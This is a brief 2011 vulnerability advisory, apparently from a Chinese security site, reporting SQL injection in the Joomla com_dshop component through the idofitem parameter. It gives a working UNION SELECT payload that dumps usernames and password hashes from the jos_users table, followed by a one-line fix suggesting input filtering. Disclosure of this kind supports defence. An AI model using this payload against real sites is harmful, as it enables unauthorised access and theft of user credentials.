Joomla component(com_dshop) SQL injection flaws and fixes-vulnerability warning-the black bar safety net

2011-12-22T00:00:00
ID MYHACK58:62201132675
Type myhack58
Reporter 佚名
Modified 2011-12-22T00:00:00

Description

Title: Joomla Component (com_dshop) SQL Injection Vulnerability

Author: CoBRa_21 www.badguest.cn uyku_cu [at] windowslive.com

Level: high risk

SQL defects

http://www.badguest.cn /[PATH]/index. php? option=com_dshop&controller=fpage&task=flypage&idofitem=1 2 (SQL)

Test example

+union+select+0,1,2,group_concat(username,0x3a,password),4,5,6,7+from+jos_users

Fix:

Filter the page to input parameters